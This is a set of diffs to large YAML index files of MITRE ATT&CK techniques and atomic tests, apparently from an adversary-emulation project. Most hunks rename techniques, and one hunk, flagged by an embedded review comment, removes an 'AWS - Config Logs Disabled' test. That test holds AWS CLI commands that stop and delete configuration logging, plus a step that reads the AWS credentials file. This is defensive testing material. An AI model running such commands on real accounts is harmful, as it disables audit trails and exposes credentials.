@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20063,7 +20062,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20099,7 +20098,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -22946,7 +22944,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22969,7 +22967,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27154,7 +27151,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27175,7 +27172,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31498,7 +31494,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31534,7 +31530,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32020,7 +32015,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32050,7 +32045,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33821,7 +33815,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -33848,7 +33842,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34250,7 +34243,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44152,7 +44144,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44182,7 +44174,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -55896,7 +55887,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -18
View File
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20121,7 +20120,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20157,7 +20156,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23062,7 +23060,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23085,7 +23083,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27270,7 +27267,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27291,7 +27288,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31614,7 +31610,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31650,7 +31646,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32136,7 +32131,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32166,7 +32161,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33995,7 +33989,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34022,7 +34016,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34424,7 +34417,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44326,7 +44318,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44356,7 +44348,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56070,7 +56061,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -18
View File
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20063,7 +20062,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20099,7 +20098,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -22946,7 +22944,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22969,7 +22967,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27154,7 +27151,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27175,7 +27172,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31498,7 +31494,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31534,7 +31530,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32020,7 +32015,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32050,7 +32045,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33821,7 +33815,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -33848,7 +33842,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34250,7 +34243,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44152,7 +44144,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44182,7 +44174,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -55896,7 +55887,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -73
View File
@@ -11173,61 +11173,6 @@ defense-evasion:
cleanup_command:
name: sh
elevation_required: false
- name: AWS - Config Logs Disabled
auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31
description: 'Disables AWS Config by stopping the configuration recorder, deleting
the delivery channel, and deleting the configuration recorder. An attacker
with sufficient permissions can use this to stop configuration change recording
and avoid detection of subsequent activity.
'
supported_platforms:
- iaas:aws
input_arguments:
configuration_recorder_name:
description: Name of the configuration recorder
type: string
default: redatomictestconfigurationrecorder
delivery_channel_name:
description: Name of the delivery channel
type: string
default: redatomictestdeliverychannel
region:
description: Name of the region
type: string
default: us-west-2
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
default profile using: aws configure
'
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo Please install terraform and configure your AWS
default profile
'
executor:
command: |
aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder stopped ***"
aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
echo "*** Delivery channel deleted ***"
aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder deleted ***"
cleanup_command: aws configservice list-configuration-recorders --region us-west-2
name: sh
elevation_required: false
T1564.003:
technique:
type: attack-pattern
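Review bot: this hunk deletes the entire `AWS - Config Logs Disabled` atomic test (`auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31`) from the defense-evasion index, which is a content change rather than a rendering one, in a commit described only as `python conversion`. Unless the source YAML for this test was removed in the same commit, the new generator is silently dropping a test; the entry uses single-quoted multi-line scalars that end in a bare newline and a `dependencies` list with `prereq_command`/`get_prereq_command`, so a YAML-loading or field-mapping difference in the converter is the first place to look. A per-technique test count compared before and after generation would catch this class of regression.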
@@ -11895,7 +11840,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11925,7 +11870,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20610,7 +20554,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20646,7 +20590,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23493,7 +23436,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23516,7 +23459,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27838,7 +27780,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27859,7 +27801,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32284,7 +32225,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32320,7 +32261,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32806,7 +32746,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32836,7 +32776,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34607,7 +34546,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34634,7 +34573,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -35036,7 +34974,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -45070,7 +45007,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45100,7 +45037,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -57029,7 +56965,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -18
View File
@@ -11550,7 +11550,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11580,7 +11580,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20441,7 +20440,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20477,7 +20476,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23409,7 +23407,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23432,7 +23430,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27617,7 +27614,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27638,7 +27635,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32118,7 +32114,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32154,7 +32150,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32640,7 +32635,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32670,7 +32665,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34526,7 +34520,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34553,7 +34547,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34955,7 +34948,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -45237,7 +45229,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45267,7 +45259,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -57280,7 +57271,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -18
View File
@@ -11511,7 +11511,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11541,7 +11541,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20350,7 +20349,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20386,7 +20385,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23350,7 +23348,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23373,7 +23371,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27558,7 +27555,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
